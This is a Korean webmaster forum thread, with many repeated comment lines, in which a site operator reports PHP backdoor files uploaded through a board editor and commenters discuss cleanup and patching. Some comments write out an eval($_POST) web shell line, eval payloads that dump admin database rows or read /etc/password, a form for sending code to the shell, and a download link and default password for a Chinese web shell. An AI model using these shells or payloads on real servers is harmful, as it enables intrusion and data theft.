해킹 인가요? data 폴더에 이상 한것이 있네요....ㅠㅠ 정보
해킹 인가요? data 폴더에 이상 한것이 있네요....ㅠㅠ
본문
사이트 이전 할려고 data 폴더를 압축 하던중 이상한 파일이 보여서 확인해보니
위의 이미지와 같은 소스의 intro.php 파일이 회원이미지 폴더와 몇군데 게시판 폴더에 업로드 되어져 있네요.
중국관련 커뮤니티를 운영하는 회원이 자신의 회원 이미지폴더에 업로드 한것으로 보여 집니다.
백도어를 심으려고 한것 같은데.... 모두 찾아서 삭제 하고 있답니다.
이런 쓰레기 같은넘들 때문에 그냥 사이트를 닫을까 하는 생각도 드네요.....ㅠㅠ
다른 분들도 이런 경우가 있나요?
추천
0
0
댓글 30개
헐... 그런게 다있네요;;
DB는 빠져나갔다고 보시면 됩니다.
그나마 php .ini 에서 exec,passthru,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source 를 disable 해 두어서 빼가지는 못한듯 하네요.
찾아보니 company.php 라는 실행 파일이 하나 더 있네요....ㅠㅠ
실행 해보았더니
This error (HTTP 403 Forbidden) means that Internet Explorer was able to connect to the website, but it does not have permission to view the webpage.
For more information about HTTP errors, see Help.
실행 php 구문을 막아주어서 웹에서 403 에러 뿌리고 죽어 버리는군요.
ch에디터와 g에디터 폴더에 업로드 되어 있네요.
회원님들도 확인 한번씩 해 보세요.
찾아보니 company.php 라는 실행 파일이 하나 더 있네요....ㅠㅠ
실행 해보았더니
This error (HTTP 403 Forbidden) means that Internet Explorer was able to connect to the website, but it does not have permission to view the webpage.
For more information about HTTP errors, see Help.
실행 php 구문을 막아주어서 웹에서 403 에러 뿌리고 죽어 버리는군요.
ch에디터와 g에디터 폴더에 업로드 되어 있네요.
회원님들도 확인 한번씩 해 보세요.
파일 실행안되는 것은 서버는 조금 안전하다고 생각되겠지만 자료는 이미 유출되었다고 보는 것이 좋을 듯 하네요. 화면에 뿌리면 되니까요. 문제는 어떤 경로로 파일을 올릴 수 있었느냐를 파악하시는 것이 우선일듯... 그게 후속대책이 아닐까 싶습니다.
파일 생성날짜를 파악해보시고 게시판에 사용된 그누버젼이라든지 아파치님이 쓰시는 빌더라든지 버젼을 확인해보시고 최근 버젼에서 그 문제가 발생했다면 현재 그누에 구멍이 있다는 걸 시사하는 겁니다.
파일 생성날짜를 파악해보시고 게시판에 사용된 그누버젼이라든지 아파치님이 쓰시는 빌더라든지 버젼을 확인해보시고 최근 버젼에서 그 문제가 발생했다면 현재 그누에 구멍이 있다는 걸 시사하는 겁니다.
순정 그누보드는 문제가 되지 않을것 같습니다.
기능을 추가한것 때문에 문제가 생긴듯한데
이기능을 이미 많은 분(개발지 와 사용자)들이 사용한다는것에 문제가 있을듯 합니다.
패치방법을 찾아서 패치를 먼저해야 할것 같네요....ㅠㅠ
기능을 추가한것 때문에 문제가 생긴듯한데
이기능을 이미 많은 분(개발지 와 사용자)들이 사용한다는것에 문제가 있을듯 합니다.
패치방법을 찾아서 패치를 먼저해야 할것 같네요....ㅠㅠ
eval 은 서버 (그러니까 FTP 비번, 게시판 비번 같은거 뽑을때) 쓰는 string 입니다. -..-;;;
eval($_POST['admin']), 이런식으로...
c99 shell 같은거 찾아서 삭제한다고 해결될 일이 아니시구요... 해커입장에서 shell 이 삭제되면 다시 깔면 그만이니까... 모든 shell 을 disable 하는 방법이 더 낫지 않을까 싶습니다. 그런데 그러면 관리자가 쓰고 있는 shell 도 못쓰게 되는거 아닌가요?
저번에도 말씀드렸지만 제 컴에서는 크롬뿐만이 아니라 아파치님 사이트 방문했을때 악성 스크립 알람이 떴었습니다.
eval($_POST['admin']), 이런식으로...
c99 shell 같은거 찾아서 삭제한다고 해결될 일이 아니시구요... 해커입장에서 shell 이 삭제되면 다시 깔면 그만이니까... 모든 shell 을 disable 하는 방법이 더 낫지 않을까 싶습니다. 그런데 그러면 관리자가 쓰고 있는 shell 도 못쓰게 되는거 아닌가요?
저번에도 말씀드렸지만 제 컴에서는 크롬뿐만이 아니라 아파치님 사이트 방문했을때 악성 스크립 알람이 떴었습니다.
이미 대부분의 펑션은 disable 되어있습니다.
파일을 실행 테스트 해보니 웹에서 그냥 403 에러 뿜고 죽어 버리네요.
파일을 실행 테스트 해보니 웹에서 그냥 403 에러 뿜고 죽어 버리네요.
eval로 파일실행이 안되어도 자료는 가져가요. eval('\$sql="select * from G4_member where mb_level=10"; \$result=mysql_query(\$sql); \$row=mysql_fetch_array(\$result); dump(\$row);");이렇게 들어올 수도 있답니다.
그리고 eval('echo file_get_contents("/etc/password");');이런 것도 가능하구요.
그리고 eval('echo file_get_contents("/etc/password");');이런 것도 가능하구요.
이제 이거보고 애들이 또 그대로 따라한다에 제 손모가지 겁니다....
-.-;;
http://sir.co.kr/bbs/board.php?bo_table=cm_free&wr_id=678812
그리고 이거 union poison 때문에 관리자님께 여쭈어 보신거죠? ㅋㅋㅋ
-.-;;
http://sir.co.kr/bbs/board.php?bo_table=cm_free&wr_id=678812
그리고 이거 union poison 때문에 관리자님께 여쭈어 보신거죠? ㅋㅋㅋ
테스트용으로 dtd버젼 설치후 search.php파일이 없길래 그냥 올린 겁니다.
다른 eval 실행파일은 없고 다행이도 본문과 같은 파일만 있어서 안심이네요...^^
그게 아닙니다. ㅠㅠ.
위의 eval안에 들어올 내용은 form을 작성해서 올라오는 겁니다.
위의 파일의 이름이 temp.php이라고 가정하고 예로 작성하면
<form method="post" action="사이트주소 및 경로/temp.php">
<textarea name="nonexx"></textarea>
<input type="submit" value="submit" />
</form>
이렇게 만든 후 폼에서 textarea에 eval로 실행시킬 값을 보내는 겁니다.
그리고 거기에 위에서 제가 언급한 코드들을 넣으면 자동으로 실행되는 거죠. 그러므로 서버상에는 위의 eval코드만 있으면 되요. 나머지는 해커가 원하는대로 실행만 하면 되구요. 만일 etc/password를 읽었다면 해커는 잘하면 root의 비밀번호를 가져간 걸로 이해하면 됩니다.
폼에서 textarea에 echo file_get_contents("/etc/password");라고 입력하고 전송하면 이 코드가 서버상에서 eval로 실행되는거죠. 그러니까 해커는 원하는 모든 php코드를 실행할 수 있는 겁니다.
위의 eval안에 들어올 내용은 form을 작성해서 올라오는 겁니다.
위의 파일의 이름이 temp.php이라고 가정하고 예로 작성하면
<form method="post" action="사이트주소 및 경로/temp.php">
<textarea name="nonexx"></textarea>
<input type="submit" value="submit" />
</form>
이렇게 만든 후 폼에서 textarea에 eval로 실행시킬 값을 보내는 겁니다.
그리고 거기에 위에서 제가 언급한 코드들을 넣으면 자동으로 실행되는 거죠. 그러므로 서버상에는 위의 eval코드만 있으면 되요. 나머지는 해커가 원하는대로 실행만 하면 되구요. 만일 etc/password를 읽었다면 해커는 잘하면 root의 비밀번호를 가져간 걸로 이해하면 됩니다.
폼에서 textarea에 echo file_get_contents("/etc/password");라고 입력하고 전송하면 이 코드가 서버상에서 eval로 실행되는거죠. 그러니까 해커는 원하는 모든 php코드를 실행할 수 있는 겁니다.
그렇군요...^^
해킹하는 인간들 참 존경(?) 스럽네요...ㅠㅠ
근데 eval코드 실행을 막는 방법은 없나요?
서버는 jail 설정과 root 접속IP를 제한해서 문제는 없을듯 합니다.
좋은 정보 얻었네요. 감사합니다. letsgolee님!
해킹하는 인간들 참 존경(?) 스럽네요...ㅠㅠ
근데 eval코드 실행을 막는 방법은 없나요?
서버는 jail 설정과 root 접속IP를 제한해서 문제는 없을듯 합니다.
좋은 정보 얻었네요. 감사합니다. letsgolee님!
그냥 모든 업로드 차단 해놓는 것이 속편합니다.
그냥 모든 업로드 차단 해놓는 것이 속편합니다. X 2
이게 진리인듯... ㅎㅎㅎㅎ
그리고 사진도 못 올리게 하고... 그래서 그누DTD 는 [이미지 url] 안 먹게 해놨더라구요. XSS 낚시 방지용으로....
이게 진리인듯... ㅎㅎㅎㅎ
그리고 사진도 못 올리게 하고... 그래서 그누DTD 는 [이미지 url] 안 먹게 해놨더라구요. XSS 낚시 방지용으로....
그냥 사이트를 없애 버리던지 다른 대책을 강구 하던지 해야 겠네요....ㅜㅜ
테러보이님도 털리시고... 사이트 운영이 참 어려운 것 같습니다. 해커/크래커들이 사이트 뚫기는 쉽지만 막기는 어려운게 현실인 것 같습니다.
파일 살펴보니 버젓이 아래 같은 것도 있내요. 나원참!!!
Copyright (C) 2004-2009 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
이건 뭔가요....중국어로 되어 있어서...
암튼 나쁜쉐이들 참 많네요. 뭐 빨아 먹을게 있다고......
Copyright (C) 2004-2009 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
이건 뭔가요....중국어로 되어 있어서...
암튼 나쁜쉐이들 참 많네요. 뭐 빨아 먹을게 있다고......
중국산 웹쉘이네요.
http://www.4ngel.net/project/phpspy_2011.rar
이걸 다운받으시고 웹에 올려서 실행시켜 보세요. 디폴트 비번은 angel 이구요.
http://www.4ngel.net/project/phpspy_2011.rar
이걸 다운받으시고 웹에 올려서 실행시켜 보세요. 디폴트 비번은 angel 이구요.
정확한 안내도 없이 이걸 왜 실행 시키라고 하시나요?
이파일을 보고 위의 사이트를 알았는데...
이파일 안에 뭐가 있는지나 아시나요? 이상한 분이시네?
이파일을 보고 위의 사이트를 알았는데...
이파일 안에 뭐가 있는지나 아시나요? 이상한 분이시네?
전 몰라서,,아무 도움도 못 드립니다..ㅠ.ㅠ
크게 피해는 없는듯 합니다....^^
가끔 한번씩 data 폴더를 살펴 봐야 겠습니다....ㅜㅜ
가끔 한번씩 data 폴더를 살펴 봐야 겠습니다....ㅜㅜ
data 폴더는 실행(x) 권한을 없애는것을 추천드립니다.
전 그 php쉘스크립트 소스 읽어보고 고개가 숙여지더라는.
한 개의 파일로 모든 기능을 구현해놓은.
공부할게. 참. 많고. 멀었네요.
한 개의 파일로 모든 기능을 구현해놓은.
공부할게. 참. 많고. 멀었네요.
그렇긴 하더라구요....ㅠㅠ
뭘그리 많은 기능을 꾸역꾸역 집어 넣어 놓았는지.....^^;;
뭘그리 많은 기능을 꾸역꾸역 집어 넣어 놓았는지.....^^;;
이제 업로드할때 php파일이면 내용검사도 해야 겠네요..ㅋㅋ
살펴보니 파일첨부가 아닌 에디터를 이용한 업로드 였습니다.
회원들에게 에디터를 공개 않하는것이 좋을듯 하네요...ㅠㅠ
서버에는 이상이 없는지 계속 테스트 중 입니다. 에효~~~
회원들에게 에디터를 공개 않하는것이 좋을듯 하네요...ㅠㅠ
서버에는 이상이 없는지 계속 테스트 중 입니다. 에효~~~
스크랩 해두고.... 살펴봐야겟어요
저의 경우에는 3번째 방법으로 해킹파일을 업로드 했더군요....ㅠㅠ
우선 막아 놓고 패치 방법을 찾아 패치를 해야 할 듯 합니다.
우선 막아 놓고 패치 방법을 찾아 패치를 해야 할 듯 합니다.